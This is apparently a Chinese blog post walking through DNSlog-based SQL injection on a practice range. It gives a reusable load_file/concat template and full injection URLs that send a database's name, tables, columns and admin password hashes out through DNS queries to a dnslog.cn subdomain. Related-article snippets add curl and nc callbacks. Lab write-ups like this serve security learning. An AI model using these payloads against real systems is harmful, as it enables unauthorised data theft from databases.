DNSlog注入学习(靶场测试全流程)

最新推荐文章于 2024-05-15 02:36:49 发布
最新推荐文章于 2024-05-15 02:36:49 发布
阅读量1.1k 收藏 7
点赞数 3
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/115838269
版权

原理:
首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了。

DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息
简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息

利用场景:
在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。

推荐使用网站 :http://dnslog.cn/
在这里插入图片描述
首先点击Get SubDomain按钮,网页会生成一个域名。
在这里插入图片描述
我们在对生成的域名进行访问后再点击右边的按钮,就可以在下方看到访问记录,也就是DNS解析的日志信息。
在这里插入图片描述

注入流程(确定注入点后):
1、先查出我们想要的内容
sql语句查出我们想要的内容
如:数据库内管理员的账户密码
用户的联系方式 等等
select database();

2、拼接域名
我们想要的东西.gfholg.dnslog.cn
select concat(‘a’,‘b’);
select concat((select database()),’.gfholg.dnslog.cn’);
我们想要的东西.gfholg.dnslog.cn

3、让目标访问
load_file() 读取文件
读取本地文件
C:\target\xunlainying\WWW\1.txt
select load_file(‘C:/target/xunlainying/WWW/1.txt’);

读取远程文件
unc
//mss.zkaq.com/1.txt

例子:
select load_file(concat(’//’,(select database()),’.6g05at.dnslog.cn/123’));
模板:
select load_file(concat(’//’,(sql 查询语句),’.dnslog.cn得到的域名/123’));

靶场实战(封神台)
在这里插入图片描述
1.这是目标网站:
在这里插入图片描述
2.and 1=1没有报错
在这里插入图片描述
3.and 1=2报错,确认有注入点
在这里插入图片描述
4.到dnslog.cn获取一个域名
在这里插入图片描述
5.拼接语句,先查询数据库
这是模板;
load_file(concat(’//’,(sql 查询语句),’.dnslog.cn得到的域名/123’));

查询数据库的语句是:
select database()

dnslog.cn得到的域名是:gkz5eq.dnslog.cn

拼接好的语句为:
load_file(concat(’//’,(select database()),’.gkz5eq.dnslog.cn/123’));

6.使用拼接好的语句进行测试:

http://59.63.200.79:8022/dns/?id=1 and load_file(concat(’//’,(select database()),’.gkz5eq.dnslog.cn/123’));

在这里插入图片描述
7.返回查看dnslog.cn中的日志,maoshe就是我们查询出的数据库名:
在这里插入图片描述
8.查表(我不小心点到了刷新,就重新生成了一个域名,域名部分忽略就行)

http://59.63.200.79:8022/dns/?id=1 and load_file(concat(’//’,(select table_name from information_schema.tables where table_schema=‘maoshe’ limit 0,1),’.ltofie.dnslog.cn/123’));

在这里插入图片描述
将limit 0,1 改成limit 1,1 后,发现第二个表
在这里插入图片描述
一共两个表 admin 和 news
9.先查admin表的列,同样改变limit 后的第一个参数,查询多个列

http://59.63.200.79:8022/dns/?id=1%20and%20load_file(concat(%27//%27,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27maoshe%27%20and%20table_name=%27admin%27limit%200,1),%27.ltofie.dnslog.cn/123%27));

在这里插入图片描述
发现有id username password 三个列

10.猜测flag在passwrd中,查询数据

http://59.63.200.79:8022/dns/?id=1%20and%20load_file(concat(%27//%27,(select%20hex(password)%20from%20admin%20limit%200,1),%27.7msbrv.dnslog.cn/123%27));
在这里插入图片描述
将十六进制数转为字符串,得到123admin,显然不是flag,继续查询
在这里插入图片描述
将十六进制数转为字符串,得到test123显然不是flag,继续查询
在这里插入图片描述

将十六进制数转为字符串,得到FlaG-biubiu,发现falg。
在这里插入图片描述

00勇士王子
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF入门web篇18命令执行无回显的判断方法及dnslog相关例题
anquanniu的博客
10-19 4495
命令执行判断 命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。 1、 延时 无延时无回显 有延时无回显 通过是否延时来判断该条命令是否有执行,有延时则代表命令有执行。(”sleep 3”表示延时3秒) 2、 HTTP请求 目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到h...
ceye-dnslog
weixin_55885866的博客
01-14 442
检查是否为 http://detectportal.firefox.com/success.txt。print(f"发生错误: {err}")# 创建一个新的参数字典,用于更改参数。开始后测试每个参数 后查看ceye平台看看是否出现问题。# 返回,不继续处理此请求。# 检查请求是否成功。# 更改当前参数的值。# 打印更改后的参数。# 在这里添加处理响应的逻辑。# 启动mitmproxy代理服务器。
DNS-log注入(zkaq靶场
v2ish1yan的博客
04-21 1287
DNS-log注入
CTF入门web篇18命令执行无回显的判断方法及dnslog相关例题_ctf web题传参数后没有回显
最新发布
m0_60707685的博客
05-15 437
例:我们在公网机上可以通过”nc -lv 端口号”来监听该端口,当目标机”curl 公网机ip:端口号”的时候,公网机的该端口可以发现有http请求过来。目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到http请求就代表命令有执行。命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。通过是否延时来判断该条命令是否有执行,有延时则代表命令有执行。(”sleep 3”表示延时3秒)
小白的CTF之路之DNSlog注入
glass_york的博客
01-07 1054
dnslog注入,sqlilabs第九关
深度剖析DNSLog注入原理&本地实例测试
monster663的博客
02-08 6209
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安法》,共同维护清朗的网络空间 Dns_log注入简介 我们将利用DNS解析的过程将留下痕迹和mysql中load_file()函数的能够访问互联网中的文件这一特点,将一些渗透的过程中将我们需要测试网站的结果回显到一个特定的可以记录DNS日志网站中,关于DNS的原理请参考https://blog.csdn.net/king9666/article/details/106022050 应用场景 DNS_log注入常用于网站对
SQL注入测试靶场.zip
01-14
靶场,是指为信息安人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安领域,靶场成为培养和提高安专业人员技能的重要平台。 首先,...
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
渗透测试靶场,模拟搭建渗透测试真实环境,搭建靶场详细流程即相关包.zip
12-05
内容:详细的渗透测试靶场搭建包,以及详细搭建流程,提供了靶场所有环境,比如sql注入,木马,获权等模拟真实环境 适用于:需要学习渗透测试相关知识,但是没有搭建好模拟真实环境的靶场人群下载以及使用,同时针对...
PHP+MYSQL 注入靶场
04-26
通过这个靶场,你可以模拟真实环境下的安测试,提升对SQL注入攻击的防御能力。下面将详细阐述SQL注入、PHP和MySQL在其中的作用以及如何进行渗透测试。 **SQL注入**是一种常见的网络安威胁,发生在应用程序未能...
【实战】一次简单的log4j漏洞测试
crowsec
12-19 3313
【实战】一次简单的log4j漏洞测试
web,sql注入之二次,加解密,dns注入等(17)
san3144393495的博客
04-26 342
这个二次注入,和前面讲到那些注入有一些小的区别,而是产生的地方区别,从查询方式我们可以根据网站的应用功能判断他是何种查询方式,还有其他的,但是他们但是在注入的原则什么进行一些编译,比如说提交方式,查询方式,参数类型等一些的不同,但这个二次注入,有不同是无法通过扫描工具或代码自己手工去测试出来的,只能从网站源代码里面才能发现二次注入漏洞,从前端或黑盒测试是看不到这种漏洞的,有也找不到,这也是它的特点,传出来是什么东西啊,肯定有问题。常规注入的话,加解密就是多了一层按照他的加密方式去提交。这是注入扩展里面的,
【SQL注入-有回显】DNS请求注入:原理、平台、使用过程、配置
06-14 1568
【SQL注入-有回显】
dnslog使用方法
qq_36232967的博客
06-20 1568
在实际使用中,DNSLog 可以用于获取恶意软件的 C&C 服务器、验证域名接入情况、检测恶意软件的行为等。请注意,使用 DNSLog 应该遵循合法和道德的原则,确保仅在合法且授权的环境中使用。此外,具体的 DNSLog 使用方法可能会根据所选择的平台而有所不同,你应该参考平台提供的文档和指南以获得更详细的操作说明。设置 DNS 配置:将你要测试的系统或应用程序的 DNS 配置中的某个域名或主机名设置为你创建的域名,例如将。创建域名:在注册的平台上,你可以创建一个自定义的域名,例如。
掌控者靶场DNS-Log注入过程
zhaoxz1985的博客
07-15 834
这里写自定义目录标题掌控者靶场DNS-Log注入过程0x01 前言0x02 利用思路0x03 靶场实战第一步:探测数据库名第二步:探测数据表名第三步:探测数据表对应的列名第四步:瞎逼懵0x04 写在最后 掌控者靶场DNS-Log注入过程 以下过程是在听取了线上课程后,结合自身经验,完成的靶场练习,若过程中有错误,还请大佬指正。 0x01 前言 DNS-LogDNS是域名解析系统,说直白点就是机器名和IP地址转换。 DNS-Log,增加了一个log,也就是增加了一个日志记录,只不过记录的DNS的域名解析
mysql——dns注入靶场
weixin_45540609的博客
04-20 215
因为在?id=1 and 1=2时,waf设置了过滤规则,所以要考虑绕过规则 apache的解析是从右往左的,当右边第一个文件不存在的时候会跳过,从而解析第二个文件 于是在url后添加一个不存在的1.txt,然后输入?id=1 and 1=1 和?id=1 and 1=2时页面回显正常了,且表示存在sql注入dnslog上获取一个域名 o6bif7.dnslog.cn 利用dns注入 输入1.txt?id=1and(selectload_file(concat('//',...
DNSLog使用
weixin_51151193的博客
12-29 1195
DNSLog基本使用
DNSLog使用方法
热门推荐
weixin_37104668的博客
09-14 1万+
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 DNSLOG工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog
封神台 dnslog注入
weixin_43836174的博客
08-27 628
靶场地址:http://59.63.200.79:8022/cat/?id=1 第一步 注入点寻找 寻找注入点,初步判断id=1处为注入点 尝试 试用 and 1=1 返回成功 1=2 报错 第二步 初步测试注入 找到注入点试用 order by n 查询 ![](https://nc0.cdn.zkaq.cn/md/6263/bdf6430495304a773942341564db2105_12336.png) 发现可以回显的字符是2为 使用 union select 1,...
PentesterLab靶场sql注入流程
07-27
PentesterLab靶场的SQL注入流程可以按照以下步骤进行: 1. 首先,我们需要找到一个存在SQL注入漏洞的目标网站。可以使用工具或手动查找目标网站。 2. 一旦找到目标网站,我们可以使用不同的注入技术进行测试。在引用\[1\]和\[2\]中提供的案例中,可以尝试使用报错注入和联合查询注入。 3. 对于报错注入,我们可以尝试在URL参数中插入一些特殊字符和SQL语句,以触发错误并获取数据库信息。例如,在引用\[1\]中提供的案例中,我们可以尝试使用updatexml函数来获取数据库名称。 4. 对于联合查询注入,我们可以尝试在URL参数中插入一些特殊字符和SQL语句,以执行额外的查询并获取数据库信息。例如,在引用\[2\]中提供的案例中,我们可以尝试使用UNION SELECT语句来获取额外的数据列。 5. 如果我们成功地发现了SQL注入漏洞并获取了数据库信息,我们可以使用工具如sqlmap来自动化注入过程,以获取更多的数据库信息。 6. 最后,我们可以根据获取的数据库信息来进一步探索和利用漏洞,以达到我们的渗透测试目标。 请注意,进行SQL注入测试时,应遵循合法和道德的原则,并获得合法的授权。 #### 引用[.reference_title] - *1* *2* [PentesterLab靶场sql注入流程](https://blog.csdn.net/m0_37570494/article/details/122727777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [一次简单的SQL注入靶场练习](https://blog.csdn.net/lza20001103/article/details/125958035)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值